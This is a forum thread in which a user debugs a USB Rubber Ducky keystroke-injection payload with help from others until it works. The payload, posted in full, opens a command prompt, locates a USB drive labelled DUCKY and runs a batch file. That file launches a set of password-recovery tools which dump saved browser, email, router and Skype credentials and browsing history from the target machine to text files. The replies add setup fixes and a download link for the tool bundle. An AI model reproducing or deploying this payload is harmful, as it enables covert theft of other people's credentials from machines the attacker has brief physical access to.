Hakintosh Posted January 1, 2015 Share Posted January 1, 2015 Hello everyone, im trying to understand why this payload doesn't work. ------------ DEFAULT_DELAY 25REM File: MrGraysRubberHacks.txtREM Target: WINDOWS VISTA/7DELAY 1000ESCAPECONTROL ESCAPEDELAY 100STRING cmdDELAY 100ENTERDELAY 150STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:)ENTERSTRING set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacksENTERSTRING %DUCKYdrive%\launch.batENTERLAUNCH.BAT file:for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)REM Output everything to this folder so I don't have everything on the duck's root.set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacksstart %DUCKYdrive%\WebBrowserPassView.exe /stext %DUCKYdrive%\WebBrowserPassView.txtstart %DUCKYdrive%\SkypeLogView.exe /stext %DUCKYdrive%\SkypeLogView.txtstart %DUCKYdrive%\RouterPassView.exe /stext %DUCKYdrive%\RouterPassView.txtstart %DUCKYdrive%\pspv.exe /stext %DUCKYdrive%\pspv.txtstart %DUCKYdrive%\PasswordFox.exe /stext %DUCKYdrive%\PasswordFox.txtstart %DUCKYdrive%\OperaPassView.exe /stext %DUCKYdrive%\OperaPassView.txtstart %DUCKYdrive%\mspass.exe /stext %DUCKYdrive%\mspass.txtstart %DUCKYdrive%\mailpv.exe /stext %DUCKYdrive%\mailpv.txtstart %DUCKYdrive%\iepv.exe /stext %DUCKYdrive%\iepv.txtstart %DUCKYdrive%\ChromePass.exe /stext %DUCKYdrive%\ChromePass.txtstart %DUCKYdrive%\ChromeHistoryView.exe /stext %DUCKYdrive%\ChromeHistoryView.txtstart %DUCKYdrive%\BulletsPassView.exe /stext %DUCKYdrive%\BulletsPassView.txtstart %DUCKYdrive%\BrowsingHistoryView.exe /stext %DUCKYdrive%\BrowsingHistoryView.txt Every time it says: "The system can not find the specified path", when it tries to start the batchfile. STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:)ENTERSTRING set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacksENTERSTRING %DUCKYdrive%\launch.batENTER Hope you guys can help me because it is making me going stupid. :D Thank you! ((P.S Excuse my english, im from germany)) Quote Link to comment Share on other sites More sharing options...
nemesis_00 Posted January 1, 2015 Share Posted January 1, 2015 have you copied files in the ducky? (the mediafire link at https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---mrgray%27s-rubber-hacks) Quote Link to comment Share on other sites More sharing options...
mreidiv Posted January 2, 2015 Share Posted January 2, 2015 (edited) do you have a drive labled ducky plugged in with a folder that says MrGraysRubberHacks that is what it is asking for here STRING set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks pluss you need to put the excicutabled on the drive labled DUCKY in the paths shown here start %DUCKYdrive%\WebBrowserPassView.exe /stext %DUCKYdrive%\WebBrowserPassView.txtstart %DUCKYdrive%\SkypeLogView.exe /stext %DUCKYdrive%\SkypeLogView.txtstart %DUCKYdrive%\RouterPassView.exe /stext %DUCKYdrive%\RouterPassView.txtstart %DUCKYdrive%\pspv.exe /stext %DUCKYdrive%\pspv.txtstart %DUCKYdrive%\PasswordFox.exe /stext %DUCKYdrive%\PasswordFox.txtstart %DUCKYdrive%\OperaPassView.exe /stext %DUCKYdrive%\OperaPassView.txtstart %DUCKYdrive%\mspass.exe /stext %DUCKYdrive%\mspass.txtstart %DUCKYdrive%\mailpv.exe /stext %DUCKYdrive%\mailpv.txtstart %DUCKYdrive%\iepv.exe /stext %DUCKYdrive%\iepv.txtstart %DUCKYdrive%\ChromePass.exe /stext %DUCKYdrive%\ChromePass.txtstart %DUCKYdrive%\ChromeHistoryView.exe /stext %DUCKYdrive%\ChromeHistoryView.txtstart %DUCKYdrive%\BulletsPassView.exe /stext %DUCKYdrive%\BulletsPassView.txtstart %DUCKYdrive%\BrowsingHistoryView.exe /stext %DUCKYdrive%\BrowsingHistoryView.txt you can download them here http://www.mediafire.com/download/nm1c62qt9w9z3wg/MrGraysRubberHacks.rar Edited January 2, 2015 by mreidiv Quote Link to comment Share on other sites More sharing options...
Hakintosh Posted January 2, 2015 Author Share Posted January 2, 2015 First at all, thank you for your help. I got 3 things on my ducky. 1. The Launch.bat 2. A folder with the exe tools and another copy of the Launch.bat and 3. the inject.bin The ducky opens the cmd and starts writing. This appears in the cmd: Microsoft Windows [Version 6.1.7601] Copyright © 2009 Microsoft Corporation. Alle Rechte vorbehalten. C:\Users\*****>for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^ | findstr "DUCKY"') do (set DUCKYdrive=%A:) C:\Users\*****>set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks C:\Users\*****>%DUCKYdrive%\launch.bat The system can not find the specified path. C:\Users\*****> It cant find the launch.bat!? Quote Link to comment Share on other sites More sharing options...
mreidiv Posted January 2, 2015 Share Posted January 2, 2015 (edited) This payload requires a usb drive Labled "DUCKY" and the usbrubberducky Edited January 2, 2015 by mreidiv Quote Link to comment Share on other sites More sharing options...
Hakintosh Posted January 2, 2015 Author Share Posted January 2, 2015 god i'm so stupid, thank you! It is working. Is it possible to start and save things right from the ducky instead of a second usb drive? Quote Link to comment Share on other sites More sharing options...
mreidiv Posted January 2, 2015 Share Posted January 2, 2015 it happens to all of us. I believe it is possiable but not feisable because of the slow read / write times with the duck and it also depends on the firmware that you are using. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.